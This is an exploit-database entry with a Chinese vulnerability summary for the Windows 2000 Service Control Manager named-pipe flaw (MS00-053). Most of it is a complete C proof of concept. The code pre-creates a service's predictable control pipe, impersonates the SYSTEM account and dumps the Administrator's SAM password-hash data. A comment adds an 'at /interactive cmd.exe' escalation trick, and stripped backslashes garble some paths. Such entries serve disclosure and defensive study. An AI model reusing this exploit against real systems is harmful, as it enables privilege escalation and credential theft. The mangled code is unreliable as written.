https://www.exploit-db.com/exploits/20133
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-116

MicrosoftWindows是美国微软（Microsoft）公司发布的一系列操作系统。服务控制管理器(services.exe)是Windows2000提供的管理工具，允许创建或修改系统服务。SCM会在每个服务开始的时候创建命名管道。但是，如果恶意程序能够在服务启动前预测并创建特定服务的命名管道的话，就可以扮演该服务的权限。这可能允许攻击者以特定用户或本地系统权限运行恶意程序。

source: http://www.securityfocus.com/bid/1535/info

The Service Control Manager (SCM) is an administrative tool in Windows 2000 which handles the creation and modification of system services such as Server, Workstation, Alerter, and ClipBook. A server-side named pipe is created before each service is started and are named in a predictable sequence which can be obtained from:

HKEY_LOCAL_MACHINESystemCurrentControlSetControlServiceCurrent

Due to the predictability of subsequent named pipes, any local user logged on interactively to a Windows 2000 machine is able create a server-side named pipe and assume the security context of the system service the next time it is started. Arbitrary code could be attached to the named pipe, making it possible for the local user to craft an exploit that would allow them to gain Administrator account status.

/*
 *  Proof of Concept
 *  Windows2000 services named pipe vulnerability
 *  
 *  Author:  Maceo
 * 
 *  Compiled with MS VC++ 6.0 SP3
 *   
 *  Compiled and tested on:
 *     D:>uname -sv
 *     Windows2000 5.0.2195
 * 
 *  Vulnerability:  Windows 2000 uses predictable named
 *  pipe names for controlling services.  Any user process
 *  can create a named pipe with the next name and force
 *  a service, they can start, to connect to the pipe.  Once
 *  connected the user process can impersonate the service,
 *  which in most cases runs in the SYSTEM account.
 *  
 *  Proof of concept:  This code abuses the clipbook service
 *  to run as the SYSTEM account and then dumps information
 *  from the local SAM database.  
 *  
 *  This file is for educational purposes only.  As many
 *  would agree, the default install of a W2K server is 
 *  inherently insecure against interactive users.  One
 *  does not have to dig very hard to find a way to 
 *  elevate a users privileges when placed in an interactive
 *  situation, such as logged in at a console.  For instance:
 *     D:>time
 *     The current time is: 23:28:38.42
 *     D:>at 23:29 /interactive cmd.exe
 *  
 *  It is with this in mind I release the following code.
 *  
 *  Disclaimer: This file is intended as proof of concept, and
 *  is not intended to be used for illegal purposes. The author
 *  does not accept responsibility for ANY damage incurred 
 *  by the use of it.
 *
 */


#include <stdio.h>
#include <windows.h>

#define ABUSE_SVC "clipbook"
#define SVC_KEY "SYSTEM\CurrentControlSet\Control\ServiceCurrent"
#define SAM_KEY "SAM\SAM\Domains\Account\Users\000001F4"


int main( )
{
  HKEY hOpen;
  DWORD dwNumber = 0;
  DWORD dwType = REG_DWORD;  
  DWORD dwSize = sizeof(DWORD);
  char szNetCmd[256];
  

  // make sure the service we want to abuse is stopped. //
  sprintf (szNetCmd, "net stop %s", ABUSE_SVC);
  system (szNetCmd);
  

  // open the current service number key //
  if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SVC_KEY, 0, KEY_READ, &hOpen))
  {
    printf ("Failed to open key:n  %sn", SVC_KEY);
    return 1;
  }
  
  // read the key //
  if (RegQueryValueEx (hOpen, "", NULL, &dwType, (BYTE *) &dwNumber, &dwSize))
  { 
    RegCloseKey (hOpen);
    printf ("Failed to read key:n  %sn", SVC_KEY);
    return 2;
  }
  
  // close the key //
  RegCloseKey (hOpen);


  // build the next named pipe name //
  char szPipe[64];
  sprintf(szPipe, "\\.\pipe\net\NtControlPipe%lu", ++dwNumber);
  
  
  // create the named pipe before scm can // 
  HANDLE hPipe = 0;
  hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 
                           PIPE_TYPE_MESSAGE|PIPE_WAIT,
                           2, 0, 0, 0, NULL);
  if (hPipe == INVALID_HANDLE_VALUE)
  {
    printf ("Failed to create named pipe:n  %sn", szPipe);
    return 3;
  }


  // start the service we are going to abuse. //
  sprintf(szNetCmd, "start /min net start %s", ABUSE_SVC);
  system(szNetCmd);
  
  
  // wait for the service to connect // 
  ConnectNamedPipe (hPipe, NULL);


  // read a byte of data from the client //
  if (!ReadFile (hPipe, (void *) &dwNumber, 4, &dwSize, NULL))
  {
    printf ("Failed to read the named pipe.n");
    CloseHandle(hPipe);
    return 4;
  }

  
  // assume the identity of the client //
  if (!ImpersonateNamedPipeClient (hPipe))
  {
    printf ("Failed to impersonate the named pipe.n");
    CloseHandle(hPipe);
    return 5;
  }

  
  // display impersonating users name //
  dwSize  = 256;
  char szUser[256];
  GetUserName(szUser, &dwSize);
  printf ("Impersonating: %sn", szUser);


  // Assume we are SYSTEM since it is the default, 
  // and let's crack open the SAM database and 
  // lookup rid 500 (Administrator unless name has been changed)
  
  if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SAM_KEY, 0, KEY_READ, &hOpen))
  {
    printf ("Failed to open key:n  %sn", SAM_KEY);
    return 1;
  }


  // read the F key //
  dwSize = 2048;
  BYTE szData[2048];
  if (RegQueryValueEx (hOpen, "F", NULL, &dwType, szData, &dwSize))
  { 
    RegCloseKey (hOpen);
    printf ("Failed to read key:n  %s\Fn", SAM_KEY);
    return 2;
  }


  // output the key //
  printf ("Dumping SAM for RID 500 ...nn");
  printf ("F:0x");
  for (DWORD i = 0; i < dwSize; i++) 
  { printf ("%2.2x", (DWORD) szData[i]); }
  printf ("nn"); 


  // read the V key //
  dwSize = 2048;
  if (RegQueryValueEx (hOpen, "V", NULL, &dwType, szData, &dwSize))
  { 
    RegCloseKey (hOpen);
    printf ("Failed to read key:n  %s\Vn", SAM_KEY);
    return 2;
  }


  // output the key //
  printf ("V:0x");
  for (i = 0; i < dwSize; i++) 
  { printf ("%2.2x", (DWORD) szData[i]); }
  printf ("n"); 


  // clean up //
  RegCloseKey (hOpen);
  CloseHandle(hPipe);
  return 0;
}

来源:BID
名称:1535
链接:http://www.securityfocus.com/bid/1535
来源:MS
名称:MS00-053
链接:http://www.microsoft.com/technet/security/bulletin/ms00-053.asp
来源：NSFOCUS
名称：8268
链接：http://www.nsfocus.net/vulndb/8268